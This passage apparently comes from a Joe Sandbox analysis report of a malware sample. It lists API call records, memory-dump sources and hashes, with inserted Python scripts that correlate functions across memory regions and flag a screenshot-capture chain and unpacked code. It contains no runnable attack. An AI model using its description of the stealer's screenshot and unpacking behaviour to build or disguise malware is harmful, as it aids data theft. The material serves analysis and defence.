• Instruction ID: 1a9609d6c9cdf59eb370d30ef3d029a06989561990cf496be797109b46c3c8f3
• Opcode Fuzzy Hash: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
• Instruction Fuzzy Hash: 2111E531D802289FCF24EBA0D8C0AEE77B2BF04714F240419E510A72D0DBB49A04CF90
APIs
• __EH_prolog3_GS.LIBCMT ref: 00404E60
  • Part of subcall function 0040BB3D: __EH_prolog3_GS.LIBCMT ref: 0040BB44
• std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EAB
• __Getcoll.LIBCPMT ref: 00404EBA
• std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ECA
Strings
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
• String ID: \J@
• API String ID: 1836011271-3870157017
• Opcode ID: ecd6d36a17cc43e97ba93c01a623e75c6b96a429ac6ca8fec0051df99147ca39
• Instruction ID: fdee6073741f171039223b21022534e6c74e6b1a9002e69b8caf09e8127dea3b
• Opcode Fuzzy Hash: ecd6d36a17cc43e97ba93c01a623e75c6b96a429ac6ca8fec0051df99147ca39
• Instruction Fuzzy Hash: 1E0169719102099FDB10EFA5C441B9DB7B0FF44319F00803EE145BB6C1DB789544CB99
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE85,00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002), ref: 0042FEF4
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF07
• FreeLibrary.KERNEL32(00000000,?,?,?,0042FE85,00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000), ref: 0042FF2A
Strings
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: d200b2febff7f97f8a2c3bc9b8f7fbb30bc0a4b2d93706d62895116e71432848
• Instruction ID: 04c50191246c36c7712c7b2292fbce18726cdb65abb1a7ec348a7059dfc2f8e8
• Opcode Fuzzy Hash: d200b2febff7f97f8a2c3bc9b8f7fbb30bc0a4b2d93706d62895116e71432848
• Instruction Fuzzy Hash: D8F0C831A10218BBDB109F90DD09B9EBFB4EF05B12F510076F805A2290CF795E44CB8C
APIs
• Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE11
• Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE35
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE48
• __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE56
Strings
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
• String ID: pScheduler
• API String ID: 3657713681-923244539
• Opcode ID: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
• Instruction ID: eb07aeb186abff06dd5fb113d00e985a326b9016228af1cb3add82d84dc8ee7b
• Opcode Fuzzy Hash: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
• Instruction Fuzzy Hash: 56F05935A40704A3C714FB05DC92CDEB3799E90718760812FE40663182DB7CAD8AC29D
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: H_prolog3_catchmake_shared
• String ID: MOC$RCC$f)D
• API String ID: 3472968176-2775210027
• Opcode ID: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
• Instruction ID: 4c5a5222f277707b7ad8892d25512f067f64ee06960eb458d866c1bd219572a0
• Opcode Fuzzy Hash: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
• Instruction Fuzzy Hash: 4DF06271580164CFDF19EF66C44066C3B75AF1AB00F854091F5486B2A0DF799A44DFA1
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bca2f52f1a06bb0bf5b391d4a2a7ad694c8b7147332e52eee2e888435f9a20d7
• Instruction ID: 170f1839d68b6508eaaaec35cfa06bac438a8aba58ef65257e70e7e464c4b835
• Opcode Fuzzy Hash: bca2f52f1a06bb0bf5b391d4a2a7ad694c8b7147332e52eee2e888435f9a20d7
• Instruction Fuzzy Hash: 3B71AF31B00266DBCB21CF95E884ABFBB75EF41360B98426BE81067290DB749D45C7E9
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
• Instruction ID: f24feca4b2bfbc12c14cec1d8029f4f6f4f9263e060ce35892e87e142c9da351
• Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
• Instruction Fuzzy Hash: C871B7719482769BCB258F54C8847BFBB79FF45318F584225F4116B180D7709AA9CBA0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00430B3F
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00430B56
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00430B75
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00430B90
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00430BA7
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3033488037-0
                                                                                                                                                                                                                                                  • Opcode ID: 77b92977eb72739321cda5c8df294ab32c7ea205dca145f02ee4833a4b4424fc
                                                                                                                                                                                                                                                  • Instruction ID: 2fc0cbae349d2941fff749f5b49d8ba5872ca9652a97fa93675838e70d9d8155
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77b92977eb72739321cda5c8df294ab32c7ea205dca145f02ee4833a4b4424fc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F51D131A00304AFEB219F69D851B6BB7F4EF5C724F14566EE809D7251E739E901CB88
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3033488037-0
                                                                                                                                                                                                                                                  • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                                                                                                                                                                  • Instruction ID: 3070da549a70c4c19448a28c609613812cd7846e21844d8ff3ca05011b9e4e9f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5151D771A80304AFDB26DF29DC41B6AB7F6EF48724F14456DE809D7250E736E911CB84
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                                  • Opcode ID: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                                                                                                                                                                                                  • Instruction ID: 2c394445bd20a04972dd2082f140732d1460e75e39bee70d4e52ced8c5000be3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A41C432A00304ABCB10DF78C981A5EB7E5EF89714F15456AE616EB391DB35ED01CB88
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                                  • Opcode ID: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                                                                                                                                                                                                  • Instruction ID: 08ad888272e3320f50a4ed504539de9e592dac140fe1e634a31cbcada99d0ffe
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0341BE32A40304AFCB15DF78C880A6DB7B6EF89714B1545A9EA19EB381E731E901CB81
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0EA,00000000,00000000,0042D928,?,0042D928,?,00000001,0042D0EA,23E85006,00000001,0042D928,0042D928), ref: 004368DA
                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00436912
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436963
                                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436975
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 0043697E
                                                                                                                                                                                                                                                    • Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 313313983-0
                                                                                                                                                                                                                                                  • Opcode ID: f65b0bdcdd2dc54c9e9de8c3602f0d94bdb7d7793a3f10faf503cccdbbfc5f31
                                                                                                                                                                                                                                                  • Instruction ID: d963c907df35f4e1b8a381e23a898db453a996a2d0481b790983a8c47d787b2f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f65b0bdcdd2dc54c9e9de8c3602f0d94bdb7d7793a3f10faf503cccdbbfc5f31
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F31F072A0021AABDF259F65DC41EAF7BA5EF44710F15422AFC04D7290EB39CD54CB94
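The records above list the same CRT helper (Opcode ID 52f7d06d…) once from the PE-backed image at 0x400000 and once from the non-PE-backed region at 0x2100000 that carries the Yara matches, while the neighbouring `_free$AllocateHeap` function appears in both regions under different Opcode IDs. The following Python is a worked example added here, not part of the Joe Sandbox report: it parses records in this flattened layout and correlates them across dump regions by Opcode ID and by API String ID. The SAMPLE text is a trimmed copy of four records from this page; the field names and function names in the code are this example's own.

```python
"""Correlate Joe Sandbox per-function records across memory dump sources.
Added example, not part of the Joe Sandbox report: parses the flattened
"APIs / Memory Dump Source / Similarity" records printed for each function
and groups them by dump region, to show which functions of the PE-backed
image at 0x400000 reappear in the non-PE-backed region at 0x2100000."""
import re
from collections import defaultdict
# "Offset: 00400000, based on PE: true" inside a Source File line
SOURCE_RE = re.compile(r"Offset: ([0-9A-F]{8}), based on PE: (true|false)")
# "_free.LIBCMT ref: 00430B3F" or "Api.MODULE(args), ref: ADDR", optionally
# prefixed with "Part of subcall function ADDR: "
CALL_RE = re.compile(r"^(?:Part of subcall function [0-9A-F]+: )?"
                     r"([\w:]+)\.(\w+)(?:\((.*)\))?,? ref: ([0-9A-F]{8})$")
FIELDS = {"API String ID:": "api_string_id", "API ID:": "api_id", "Opcode ID:": "opcode_id"}
# Trimmed copy of four records from this page: hash and fuzzy-hash lines,
# "Similarity" headers and most call arguments dropped; layout is the report's.
SAMPLE = """\
APIs
  • Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866), ref: 004336C9
• _free.LIBCMT ref: 00430B3F
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID: _free$AllocateHeap
• API String ID: 3033488037-0
• Opcode ID: 77b92977eb72739321cda5c8df294ab32c7ea205dca145f02ee4833a4b4424fc
APIs
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Yara matches
• API ID: _free$AllocateHeap
• API String ID: 3033488037-0
• Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
APIs
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID: _free
• API String ID: 269201875-0
• Opcode ID: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
APIs
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Yara matches
• API ID: _free
• API String ID: 269201875-0
• Opcode ID: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
"""

def parse_records(text):
    """Split the flattened dump into one dict per function record."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "APIs":                      # every record starts here
            cur = dict(offset=None, pe_backed=None, yara=False, api_id="",
                       api_string_id="", opcode_id="", calls=[])
            records.append(cur)
        elif cur is None:                       # text before the first record
            continue
        elif line == "Yara matches":
            cur["yara"] = True
        elif line.startswith("Source File:"):
            m = SOURCE_RE.search(line)
            cur["offset"] = int(m.group(1), 16)
            cur["pe_backed"] = m.group(2) == "true"
        elif line.startswith(tuple(FIELDS)):
            key, value = line.split(":", 1)
            cur[FIELDS[key + ":"]] = value.strip()
        else:
            m = CALL_RE.match(line)
            if m:                               # (api, module, ref address)
                cur["calls"].append((m.group(1), m.group(2), int(m.group(4), 16)))
    return records

def region_summary(records):
    """Per dump region: function count, PE-backed flag, Yara-tagged count."""
    out = {}
    for r in records:
        s = out.setdefault(r["offset"], {"records": 0, "pe_backed": r["pe_backed"], "yara": 0})
        s["records"] += 1
        s["yara"] += int(r["yara"])
    return out

def shared_opcode_ids(records):
    """Opcode IDs (byte-level function identity) seen in more than one region."""
    by_op = defaultdict(set)
    for r in records:
        if r["opcode_id"]:
            by_op[r["opcode_id"]].add(r["offset"])
    return {op: offs for op, offs in by_op.items() if len(offs) > 1}

def api_profile_variants(records):
    """Same API profile (API String ID) in several regions but differing Opcode IDs."""
    by_sig = defaultdict(dict)                  # sig -> {offset: {opcode ids}}
    for r in records:
        if r["api_string_id"]:
            by_sig[r["api_string_id"]].setdefault(r["offset"], set()).add(r["opcode_id"])
    return {sig: regs for sig, regs in by_sig.items()
            if len(regs) > 1 and len(set().union(*regs.values())) > 1}
```

Run against the full function listing, `shared_opcode_ids` returns the functions that exist byte-identically in both the image and the non-PE-backed region, which is the usual footprint of an in-memory copy of the payload, and `api_profile_variants` returns the ones whose API call profile survived the copy but whose bytes did not; those are the candidates to diff between the two dumps. `region_summary` keeps the "based on PE" flag and Yara count per region so the two sets can be read in context.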
APIs
• _SpinWait.LIBCONCRT ref: 0041AEDB
  • Part of subcall function 00410F11: _SpinWait.LIBCONCRT ref: 00410F29
• Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEEF
• Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF21
• List.LIBCMT ref: 0041AFA4
• List.LIBCMT ref: 0041AFB3
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
• String ID:
• API String ID: 3281396844-0
• Opcode ID: f58ac660b0453a3e9b818a0a9febcd8ba4b28c7f9e8e1f6154efc2f6275add08
• Instruction ID: 8a1b27d7ac99c42c423c038c6da62c4f09041a57878ada6c0d5966c490a343f4
• Opcode Fuzzy Hash: f58ac660b0453a3e9b818a0a9febcd8ba4b28c7f9e8e1f6154efc2f6275add08
• Instruction Fuzzy Hash: 76318B71A02719DFCB10EFA5D5915EEB7B1BF04308F04006FE80167242DB796DA5CB9A

APIs
• _SpinWait.LIBCONCRT ref: 0211B142
  • Part of subcall function 02111178: _SpinWait.LIBCONCRT ref: 02111190
• Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0211B156
• Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0211B188
• List.LIBCMT ref: 0211B20B
• List.LIBCMT ref: 0211B21A
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
• String ID:
                                                                                                                                                                                                                                                  • API String ID: 3281396844-0
                                                                                                                                                                                                                                                  • Opcode ID: 412e926916d4707ad4bdb87e4df70d0866a2e761e0501b7c3a349567627f0364
                                                                                                                                                                                                                                                  • Instruction ID: e539a5e9831fb0e36702ca8d7fffa927f5f5ca338c28efc2a090547fb656ca37
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 412e926916d4707ad4bdb87e4df70d0866a2e761e0501b7c3a349567627f0364
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4315772D89A66DFCB18EFA4E9906EDF7B2BF44308F06007AC85167650DB716A14CF90
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00402060
                                                                                                                                                                                                                                                  • GdipAlloc.GDIPLUS(00000010), ref: 00402068
                                                                                                                                                                                                                                                  • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 00402083
                                                                                                                                                                                                                                                  • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020AD
                                                                                                                                                                                                                                                  • GdiplusShutdown.GDIPLUS(?), ref: 004020D9
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2357751836-0
                                                                                                                                                                                                                                                  • Opcode ID: c047b4a56322b1034ae7938cbcb78c43e1d8d2715f6ad981a1214ddf5e978d77
                                                                                                                                                                                                                                                  • Instruction ID: 3210944159f0fc98eb109693a3395d5946c9c878d3acb397b58b4dcf5ef0325c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c047b4a56322b1034ae7938cbcb78c43e1d8d2715f6ad981a1214ddf5e978d77
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E72171B5A0031AAFCB10DF65DD459AFFBB8FF48741B104036EA02E3290D7759901CBA8
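The GDI+ block above (GdipCreateBitmapFromHBITMAP followed by GdipSaveImageToFile at 0x00402083 / 0x004020AD) is the evidence behind the report's "Contains functionality to record screenshots" signature, while the surrounding LIBCMT / LIBCPMT / LIBCONCRT blocks are statically linked runtime code that tells an analyst nothing about the sample. A triage script that parses these function blocks and separates the two is shown below; it is an added example, not part of the Joe Sandbox report or its tooling. The parser assumes the exact line layout used on this page ("APIs" header, "•" bullets, "ref: <address>", "based on PE: true/false"); the embedded input is two blocks copied verbatim from this report, constructed here so the script runs offline.

```python
import re
from dataclasses import dataclass, field

# Constructed input: two function blocks copied from the report above
# (the GDI+ block at 0x00402060 and the std::_Locinfo block at 0x02105099).
SAMPLE = """APIs
• GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00402060
• GdipAlloc.GDIPLUS(00000010), ref: 00402068
• GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 00402083
• GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020AD
• GdiplusShutdown.GDIPLUS(?), ref: 004020D9
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
• String ID:
• API String ID: 2357751836-0
• Opcode ID: c047b4a56322b1034ae7938cbcb78c43e1d8d2715f6ad981a1214ddf5e978d77
APIs
• std::_Locinfo::_Locinfo.LIBCPMT ref: 02105099
• std::_Locinfo::~_Locinfo.LIBCPMT ref: 021050AD
  • Part of subcall function 0210BDA4: __EH_prolog3_GS.LIBCMT ref: 0210BDAB
• std::_Locinfo::_Locinfo.LIBCPMT ref: 02105112
• __Getcoll.LIBCPMT ref: 02105121
• std::_Locinfo::~_Locinfo.LIBCPMT ref: 02105131
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Similarity
• Opcode ID: 44aaa5f46009dce830ee941fe4bea5556b318a4865790ba87b622e4823c10ac4
"""

# One API line: optional "Part of subcall function XXXXXXXX:" prefix, then
# <name>.<MODULE>[(args)][,] ref: <address>. Module names are upper-case.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>.+?)\.(?P<mod>[A-Z0-9_]+)(?P<args>\(.*\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)
SRC_RE = re.compile(r"Offset: (?P<off>[0-9A-F]{8}), based on PE: (?P<pe>true|false)")
OPC_RE = re.compile(r"Opcode ID: (?P<id>[0-9a-f]{64})")

# Statically linked MSVC runtime / PPL libraries: not the sample's own logic.
CRT_MODULES = {"LIBCMT", "LIBCPMT", "LIBCONCRT"}
# Bitmap taken from a GDI HBITMAP and written to disk: screenshot-to-file chain.
SCREENSHOT_CHAIN = {"GdipCreateBitmapFromHBITMAP", "GdipSaveImageToFile"}


@dataclass
class Block:
    apis: list = field(default_factory=list)  # (name, module, ref, is_subcall)
    offset: str = ""
    backed_by_pe: bool = True
    opcode_id: str = ""


def parse_blocks(text):
    """Split report text into function blocks, one per 'APIs' header."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = Block()
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            cur.apis.append((m["name"], m["mod"], m["ref"], m["sub"] is not None))
            continue
        m = SRC_RE.search(line)
        if m:
            cur.offset, cur.backed_by_pe = m["off"], m["pe"] == "true"
            continue
        m = OPC_RE.search(line)
        if m:
            cur.opcode_id = m["id"]
    return blocks


def triage(block):
    """Return human-readable tags for a block: capability, noise, memory origin."""
    names = {a[0] for a in block.apis}
    mods = {a[1] for a in block.apis}
    tags = []
    if SCREENSHOT_CHAIN <= names:
        tags.append("screenshot-to-file chain (GDI+ HBITMAP -> GdipSaveImageToFile)")
    if mods and mods <= CRT_MODULES:
        tags.append("statically linked CRT/PPL code, not sample logic")
    if not block.backed_by_pe:
        # Memory with no PE file behind it is where an unpacked stage lives,
        # consistent with the report's "Detected unpacking" signatures.
        tags.append(f"non-PE-backed memory at {block.offset} (unpacked region)")
    return tags


if __name__ == "__main__":
    for b in parse_blocks(SAMPLE):
        first = b.apis[0][2] if b.apis else "?"
        print(f"block @ {first} ({b.opcode_id[:12]}...): {triage(b)}")
```

Run over a full report export, the same two checks separate the handful of blocks that carry sample behaviour (GDI+, clipboard, socket, screenshot) from the hundreds of runtime blocks, and the "based on PE: false" flag points at the region to dump for the unpacked LummaC payload.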
APIs
• std::_Locinfo::_Locinfo.LIBCPMT ref: 02105099
• std::_Locinfo::~_Locinfo.LIBCPMT ref: 021050AD
  • Part of subcall function 0210BDA4: __EH_prolog3_GS.LIBCMT ref: 0210BDAB
• std::_Locinfo::_Locinfo.LIBCPMT ref: 02105112
• __Getcoll.LIBCPMT ref: 02105121
• std::_Locinfo::~_Locinfo.LIBCPMT ref: 02105131
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: Locinfostd::_$Locinfo::_Locinfo::~_$GetcollH_prolog3_
• String ID:
• API String ID: 1844465188-0
• Opcode ID: 44aaa5f46009dce830ee941fe4bea5556b318a4865790ba87b622e4823c10ac4
• Instruction ID: 33c8878b1d331273e391e21e507134f9805b4fafe97f2afa7ac0bc22ee6bd414
• Opcode Fuzzy Hash: 44aaa5f46009dce830ee941fe4bea5556b318a4865790ba87b622e4823c10ac4
• Instruction Fuzzy Hash: 7E217971990308EFDB20EFA4D494B9DBBB2BF54711F50861AE085AB2C1DBF49944CF91
APIs
• GetLastError.KERNEL32(?,?,?,0042EABE,00434D6C,?,00431EF8,00000001,00000364,?,0042DFD5,00457910,00000010), ref: 00431F53
• _free.LIBCMT ref: 00431F88
• _free.LIBCMT ref: 00431FAF
• SetLastError.KERNEL32(00000000), ref: 00431FBC
• SetLastError.KERNEL32(00000000), ref: 00431FC5
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
